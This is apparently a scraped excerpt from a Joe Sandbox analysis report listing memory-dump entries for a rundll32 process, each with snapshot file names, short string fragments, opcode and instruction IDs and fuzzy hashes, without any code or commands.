                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 00000005.00000003.1449292669.0000000004AC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04AC0000, based on PE: false
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_5_3_4ac0000_rundll32.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                                                            • String ID: (q$eld
                                                                                                                                                                                                                                                                            • API String ID: 0-453229166
                                                                                                                                                                                                                                                                            • Opcode ID: 09c2fc60c5bbf8e9f9776922e9edd11737169ca022fcbecd035ac7b6fb565a64
                                                                                                                                                                                                                                                                            • Instruction ID: 29de49dbde63ef33b7870607d825dbfd2e7a16e94fdfaac72ac5de048127b0d8
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 09c2fc60c5bbf8e9f9776922e9edd11737169ca022fcbecd035ac7b6fb565a64
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: ED715E35E003089FEB15EBE5C450B9EBBB3EF88311F108469E116777A0DE396D469B52
                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 00000005.00000003.1449292669.0000000004AC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04AC0000, based on PE: false
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_5_3_4ac0000_rundll32.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                                                            • String ID: $q$$q
                                                                                                                                                                                                                                                                            • API String ID: 0-3126353813
                                                                                                                                                                                                                                                                            • Opcode ID: a5796d369cbbe68909c9bd5f5387d639aac13ce9b9c8f17ebe91d046e5e4068c
                                                                                                                                                                                                                                                                            • Instruction ID: 0e1eafa2de892f3eefa80b745e5f97647a652b47f9c9902caeb677bc40ee3b19
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: a5796d369cbbe68909c9bd5f5387d639aac13ce9b9c8f17ebe91d046e5e4068c
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: CE51ED71B013089FDB64DF79D850AAEBBF6FFC9250B14812AE815D7351DA30AC028BA0
                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 00000005.00000003.1449292669.0000000004AC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04AC0000, based on PE: false
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_5_3_4ac0000_rundll32.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                                                            • String ID: (q$eld
                                                                                                                                                                                                                                                                            • API String ID: 0-453229166
                                                                                                                                                                                                                                                                            • Opcode ID: 5b1726ba7721e061171cb1135e50f5b5c8baec082b233fd3c308ba1a058226b8
                                                                                                                                                                                                                                                                            • Instruction ID: 8aa83dcc45ca3cc0c864f06878e5c14865761a837f08623463c02eaa5cd5b2ef
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 5b1726ba7721e061171cb1135e50f5b5c8baec082b233fd3c308ba1a058226b8
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: D651C0353047408FD725DB25D458A2ABBF2EFC9310B08C6ADD44A8B665DA34FC06C791
                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 00000005.00000003.1449292669.0000000004AC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04AC0000, based on PE: false
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_5_3_4ac0000_rundll32.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                                                            • String ID: (q$4'q
                                                                                                                                                                                                                                                                            • API String ID: 0-1357480937
                                                                                                                                                                                                                                                                            • Opcode ID: b82f6cc7bf42dd8b13798100cb8f17a9acb534873bb738b8067d80bf8e65b093
                                                                                                                                                                                                                                                                            • Instruction ID: 9146013514f49b3e503aba6e73abbbeb1893a9f0ac5383f22ff3d67c71ef9753
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: b82f6cc7bf42dd8b13798100cb8f17a9acb534873bb738b8067d80bf8e65b093
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: CB419C30B002158FEB58EF69D85065E77A3AFC8245724859EE409DF395DE34EC06CBAA
                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 00000005.00000003.1449292669.0000000004AC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04AC0000, based on PE: false
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_5_3_4ac0000_rundll32.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                                                            • String ID: (q$LRq
                                                                                                                                                                                                                                                                            • API String ID: 0-2259313658
                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 00000005.00000003.1449292669.0000000004AC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04AC0000, based on PE: false
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_5_3_4ac0000_rundll32.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                                                            • String ID: (q$eld
                                                                                                                                                                                                                                                                            • API String ID: 0-453229166
                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 00000005.00000003.1449292669.0000000004AC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04AC0000, based on PE: false
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_5_3_4ac0000_rundll32.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                                                            • String ID: (q$uctorAsync
                                                                                                                                                                                                                                                                            • API String ID: 0-3930638032
                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 00000005.00000003.1449292669.0000000004AC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04AC0000, based on PE: false
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_5_3_4ac0000_rundll32.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                                                            • String ID: (q$eld
                                                                                                                                                                                                                                                                            • API String ID: 0-453229166
                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 00000005.00000003.1449292669.0000000004AC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04AC0000, based on PE: false
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_5_3_4ac0000_rundll32.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                                                            • String ID: Async>d__99$ils>
                                                                                                                                                                                                                                                                            • API String ID: 0-4291727702
                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 00000005.00000003.1449292669.0000000004AC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04AC0000, based on PE: false
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_5_3_4ac0000_rundll32.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                                                            • String ID: (q$eld
                                                                                                                                                                                                                                                                            • API String ID: 0-453229166
                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                            • KiUserExceptionDispatcher.NTDLL ref: 06F19FF8
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 00000005.00000003.1449324041.0000000006F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F10000, based on PE: false
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_5_3_6f10000_rundll32.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: DispatcherExceptionUser
                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                            • API String ID: 6842923-0
                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                            • KiUserExceptionDispatcher.NTDLL ref: 06F19FF8
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 00000005.00000003.1449324041.0000000006F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F10000, based on PE: false
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_5_3_6f10000_rundll32.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: DispatcherExceptionUser
                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                            • API String ID: 6842923-0
Strings
Memory Dump Source
• Source File: 00000005.00000003.1449292669.0000000004AC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04AC0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_3_4ac0000_rundll32.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                                                            • String ID: (q
                                                                                                                                                                                                                                                                            • API String ID: 0-2414175341
                                                                                                                                                                                                                                                                            • Opcode ID: c7ee37dbb9b4ecfcd326a2e00f555b242ae1184219b189485fce8d946acd702c
                                                                                                                                                                                                                                                                            • Instruction ID: 5d3810a63a191f80ee3838c85d5e3da60a5210d478507cd231482775f96ca904
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: c7ee37dbb9b4ecfcd326a2e00f555b242ae1184219b189485fce8d946acd702c
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 6D718535F002149FEB54ABB5C8547AEBAA7EFC8210F14802DE506EB365DE35EC029B91
                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 00000005.00000003.1449292669.0000000004AC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04AC0000, based on PE: false
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_5_3_4ac0000_rundll32.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                                                            • String ID: (q
                                                                                                                                                                                                                                                                            • API String ID: 0-2414175341
                                                                                                                                                                                                                                                                            • Opcode ID: 5ff57ec72bd4b7e3ccb02c2a23007442361dcc0588f531cd62853b0e31a1bd3e
                                                                                                                                                                                                                                                                            • Instruction ID: 7fc378f6a811032308357b45edb341a72c821f90debfae1c7e32e6d26c3dd928
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 5ff57ec72bd4b7e3ccb02c2a23007442361dcc0588f531cd62853b0e31a1bd3e
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: D1613A7AB002059FDB11CF69D88099ABBF6FF8D31071481AAE919DB321D731ED16DB90
                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 00000005.00000003.1449292669.0000000004AC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04AC0000, based on PE: false
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_5_3_4ac0000_rundll32.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                                                            • String ID: (q
                                                                                                                                                                                                                                                                            • API String ID: 0-2414175341
                                                                                                                                                                                                                                                                            • Opcode ID: c91bc87fe4b1931c4b1a78349962564cf7b3271e2adec41eec61b3e95d97558d
                                                                                                                                                                                                                                                                            • Instruction ID: 5b08415a104171bd95f1c8d4f2e7ecd4562e9f6b950421a9147a159bfee39dde
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: c91bc87fe4b1931c4b1a78349962564cf7b3271e2adec41eec61b3e95d97558d
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 9041E931F002045BFB58A7A9D46176E77A6DFC8210F54812ED906EB381CE35AC0787D5
                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 00000005.00000003.1449292669.0000000004AC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04AC0000, based on PE: false
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_5_3_4ac0000_rundll32.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                                                            • String ID: __BackingField
                                                                                                                                                                                                                                                                            • API String ID: 0-2062551806
                                                                                                                                                                                                                                                                            • Opcode ID: 8e8f7c74cc3e22b9287be5fcd14d707efa814ec2fb3e26e0ce9c770bb447ab2b
                                                                                                                                                                                                                                                                            • Instruction ID: ad345447464ba7b73dbf188de113f9d25ff92c8255c5c3a32dda2240c9fb12e1
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 8e8f7c74cc3e22b9287be5fcd14d707efa814ec2fb3e26e0ce9c770bb447ab2b
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: A3515D38B013055FDB09EB28E591A6EFBA3EBC42017109669E5059B358DF70FD0B8BD1
                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 00000005.00000003.1449292669.0000000004AC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04AC0000, based on PE: false
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_5_3_4ac0000_rundll32.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                                                            • String ID: __BackingField
                                                                                                                                                                                                                                                                            • API String ID: 0-2062551806
                                                                                                                                                                                                                                                                            • Opcode ID: d7755c8819161213ca01840042e9d50c55ada694ecbdd0625273a77b25d90bd6
                                                                                                                                                                                                                                                                            • Instruction ID: 3fe7db468c02639a809d781bd0ba3ed15f1af09c46cc955ae20fc332eb4aa74e
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: d7755c8819161213ca01840042e9d50c55ada694ecbdd0625273a77b25d90bd6
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 93516D38B013055FDB08EB68E591A6EFBA3EBC4201B009669E5059B358DF70FD0B8BC1
                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 00000005.00000003.1449292669.0000000004AC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04AC0000, based on PE: false
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_5_3_4ac0000_rundll32.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                                                            • String ID: (Aq
                                                                                                                                                                                                                                                                            • API String ID: 0-165228061
                                                                                                                                                                                                                                                                            • Opcode ID: bc9178d0a303f8c5032dec8f91a16f9d7a8de413ad9067a9afbac1d379ad49b7
                                                                                                                                                                                                                                                                            • Instruction ID: 754996e5437404b71449f0ddc22a30e08723e320ce696d657be9c7b8ee962365
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: bc9178d0a303f8c5032dec8f91a16f9d7a8de413ad9067a9afbac1d379ad49b7
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 43414D70B102159FDB58DF69D855AAEBBB6FF88204F144129E406AB390EF74AC02CB91
                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 00000005.00000003.1449292669.0000000004AC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04AC0000, based on PE: false
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_5_3_4ac0000_rundll32.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                                                            • String ID: (q
                                                                                                                                                                                                                                                                            • API String ID: 0-2414175341
                                                                                                                                                                                                                                                                            • Opcode ID: 71d739323149250ad7461f645416e248b86cfa67aaeae90c7b86c8dfd6a902fb
                                                                                                                                                                                                                                                                            • Instruction ID: b102236da9f827b1ac8ed6ffb4f1b509a796ca96bad9395c88ed0f3f593e23a9
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 71d739323149250ad7461f645416e248b86cfa67aaeae90c7b86c8dfd6a902fb
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: B0418B34A006048FDB54DF29C480A6ABBF2FF89355B15C96DE41AAB751DB34F841CB94
                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 00000005.00000003.1449292669.0000000004AC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04AC0000, based on PE: false
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_5_3_4ac0000_rundll32.jbxd
                                                                                                                                                                                                                                                                            Similarity
Memory Dump Source
• Source File: 00000005.00000003.1449292669.0000000004AC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04AC0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_3_4ac0000_rundll32.jbxd
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_5_3_4ac0000_rundll32.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                                                            • String ID: Field
                                                                                                                                                                                                                                                                            • API String ID: 0-2587126364
                                                                                                                                                                                                                                                                            • Opcode ID: 354c21291c5a65faf770f5a832cb420a33a599c7ac54c6c452c73180af32bcf1
                                                                                                                                                                                                                                                                            • Instruction ID: 83ff63e832346102f95a290496a2baf20646f14465f170c664f4a30a8e3796be
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 354c21291c5a65faf770f5a832cb420a33a599c7ac54c6c452c73180af32bcf1
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 1BE0DF70A063006FF3216330E8537C57B21EB85208F01809BE1419F5A2CE51BC0B43C6
                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 00000005.00000003.1449292669.0000000004AC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04AC0000, based on PE: false
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_5_3_4ac0000_rundll32.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                                                            • String ID: Async>d__99
                                                                                                                                                                                                                                                                            • API String ID: 0-3050118332
                                                                                                                                                                                                                                                                            • Opcode ID: 4cdf1c95a044a8350b2acda988669c19480adb4533a6705e85843e9836b856ad
                                                                                                                                                                                                                                                                            • Instruction ID: 1207322918b25b8383ea9c252a2c6bcc6908e7a94e0ef8b7c5256ca60056487c
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 4cdf1c95a044a8350b2acda988669c19480adb4533a6705e85843e9836b856ad
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 10D0C232B003146FD718AAB99800A9A7FD9DE40161700406E980ADB240EE35E9404390
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 00000005.00000003.1449292669.0000000004AC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04AC0000, based on PE: false
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_5_3_4ac0000_rundll32.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                                                                                            • Opcode ID: e40e02eec92b3d75f569773802afbf30d5f80c3c6d8e9d8bc784a64d7bc747b8
                                                                                                                                                                                                                                                                            • Instruction ID: e6fb56ccd71bf0f295f4bedbe99364a1104dc0f5f29c95ebb070bdcb0f601701
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: e40e02eec92b3d75f569773802afbf30d5f80c3c6d8e9d8bc784a64d7bc747b8
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: F2D13974A003598FDB55CFA8C988A9DBBF6FF89300F148199D808AF265DB74ED46CB50
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 00000005.00000003.1449292669.0000000004AC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04AC0000, based on PE: false
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_5_3_4ac0000_rundll32.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                                                                                            • Opcode ID: c9f0540f5c586d237bdc427af65b23350bc40522691ea0b4a348fd299115adbe
                                                                                                                                                                                                                                                                            • Instruction ID: c60c8ee9511281c7c88c6fe5704e4bc20b3c3d6cdb627d7115d5edb4766d422d
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: c9f0540f5c586d237bdc427af65b23350bc40522691ea0b4a348fd299115adbe
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 13B15B34B006018FDB15DF39D59496EBBF2FF88205B14856AE90A8B365EF34EC06CB91
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 00000005.00000003.1449292669.0000000004AC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04AC0000, based on PE: false
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_5_3_4ac0000_rundll32.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                                                                                            • Opcode ID: 5b960e1a1d56b8d043ec5e531004ebf6a0133377c8a1185abd25446e3a2c1dd6
                                                                                                                                                                                                                                                                            • Instruction ID: c3960d35941974a79870ced35b0701b1724e26cd5020a633850081a49487e999
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 5b960e1a1d56b8d043ec5e531004ebf6a0133377c8a1185abd25446e3a2c1dd6
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 0B716C34B006018FDB15DF39D49456EFBF2FF88205B0486AAE90A9B355DB74EC06CBA1
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 00000005.00000003.1449292669.0000000004AC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04AC0000, based on PE: false
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_5_3_4ac0000_rundll32.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                                                                                            • Opcode ID: 8ef6e83d2c5bcd548001992a1a43be3e328a1f1f16f651fc732db17f10f4ae66
                                                                                                                                                                                                                                                                            • Instruction ID: 70142ee182317888c4c95d25493af3412128fa3c715232c027215752c2eff442
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 8ef6e83d2c5bcd548001992a1a43be3e328a1f1f16f651fc732db17f10f4ae66
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: C95102347045058FDB999F7AC898B3A77F6AFC961232980ADE006CB371EE70EC059B50
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 00000005.00000003.1449292669.0000000004AC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04AC0000, based on PE: false
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_5_3_4ac0000_rundll32.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                                                                                            • Opcode ID: 1b66af541e497832c13446a6a7be99d32182d0a581e7fba56ecc09505d07dd0b
                                                                                                                                                                                                                                                                            • Instruction ID: b0742342eb89ca1395f56ba45975ce91fdcf49427f5787d568aae68f448bbcf6
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 1b66af541e497832c13446a6a7be99d32182d0a581e7fba56ecc09505d07dd0b
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 42616E30B002059FDB58DF69D5956AEBBF6FF88700B24842DE406EB394DF74AD058B91
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 00000005.00000003.1449292669.0000000004AC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04AC0000, based on PE: false
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_5_3_4ac0000_rundll32.jbxd
Memory Dump Source
• Source File: 00000005.00000003.1449292669.0000000004AC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04AC0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_3_4ac0000_rundll32.jbxd
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: f5f06cb5f0060532c8da243cc17be7a68431d1395922a36e5904d60a7da0f191
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 6841E331B002558FCB24DF69C88896EBFF6EF89201B04445EE046CB365DB74EC05CB60
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 00000005.00000003.1449292669.0000000004AC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04AC0000, based on PE: false
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_5_3_4ac0000_rundll32.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                                                                                            • Opcode ID: 87b9c0b34d3052a0efe17629e53d830cf74e2a39d06961e48daeb6044116e796
                                                                                                                                                                                                                                                                            • Instruction ID: b3a0cd1c5a50bdff67bafe97b5c81f3e0c247b53f0f2d53b86e873711d6ff92e
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 87b9c0b34d3052a0efe17629e53d830cf74e2a39d06961e48daeb6044116e796
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 2E31AF35B011058FEB10CF6AE881AAEF7EAEF84214B18C16AE51CD7755DB71FC018BA0
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 00000005.00000003.1449292669.0000000004AC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04AC0000, based on PE: false
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_5_3_4ac0000_rundll32.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                            • API String ID:
